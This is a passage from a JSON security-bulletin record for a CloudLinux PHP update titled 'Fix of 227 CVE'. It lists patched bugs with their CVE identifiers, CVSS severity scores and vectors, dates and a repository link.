(CVE-2016-4073)\n- Fix bug #70014: openssl_random_pseudo_bytes() is not cryptographically secure\n (CVE-2015-8867)\n- Fix bug #77371: heap buffer overflow in mb regex functions - compile_string_node\n (CVE-2019-9023)\n- Fix bug #77381: heap buffer overflow in multibyte match_at (CVE-2019-9023)\n- Fix bug #77382: heap buffer overflow due to incorrect length in expand_case_fold_string\n (CVE-2019-9023)\n- Fix bug #77385: buffer overflow in fetch_token (CVE-2019-9023)\n- Fix bug #77394: Buffer overflow in multibyte case folding - unicode (CVE-2019-9023)\n- Fix vulnerabilities with oniguruma: CVE-2017-9226, CVE-2017-9224, CVE-2017-9227,\n CVE-2017-9228, CVE-2019-13224\n- Fix general vulneravilities: CVE-2014-9653, CVE-2015-0235, CVE-2015-3152,\n CVE-2016-3074\n- Fix bug #79699: PHP parses encoded cookie names so malicious `__Host-` cookies\n can be sent (CVE-2020-7070)\n- Fix bug #80007: Potential type confusion in unixtojd() parameter parsing", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-15T12:00:00", "type": "cloudlinux", "title": "Fix of 227 CVE", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-7243", "CVE-2011-4718", "CVE-2014-9653", "CVE-2014-9767", "CVE-2015-0235", "CVE-2015-2331", "CVE-2015-2348", "CVE-2015-3152", "CVE-2015-3330", "CVE-2015-3411", "CVE-2015-4025", "CVE-2015-4026", "CVE-2015-4598", "CVE-2015-5590", "CVE-2015-6831", "CVE-2015-6833", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7804", "CVE-2015-8835", "CVE-2015-8867", "CVE-2015-8876", "CVE-2015-8879", "CVE-2016-10159", "CVE-2016-10160", "CVE-2016-10161", "CVE-2016-2554", "CVE-2016-3074", "CVE-2016-4073", "CVE-2016-4343", "CVE-2016-4537", "CVE-2016-4540", "CVE-2016-4541", "CVE-2016-4542", "CVE-2016-5093", "CVE-2016-5094", "CVE-2016-5096", "CVE-2016-5399", "CVE-2016-5766", "CVE-2016-5772", "CVE-2016-6288", "CVE-2016-6289", "CVE-2016-6290", "CVE-2016-6291", "CVE-2016-6294", "CVE-2016-6296", "CVE-2016-6297", "CVE-2016-7128", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7478", "CVE-2016-8670", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-7890", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2018-5712", "CVE-2019-11048", "CVE-2019-13224", "CVE-2019-9023", "CVE-2020-7067", "CVE-2020-7070"], "modified": "2020-10-15T12:00:00", "id": "CLSA-2020:1605798462", "href": "https://repo.cloudlinux.com/centos6-els/updateinfo.xml", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}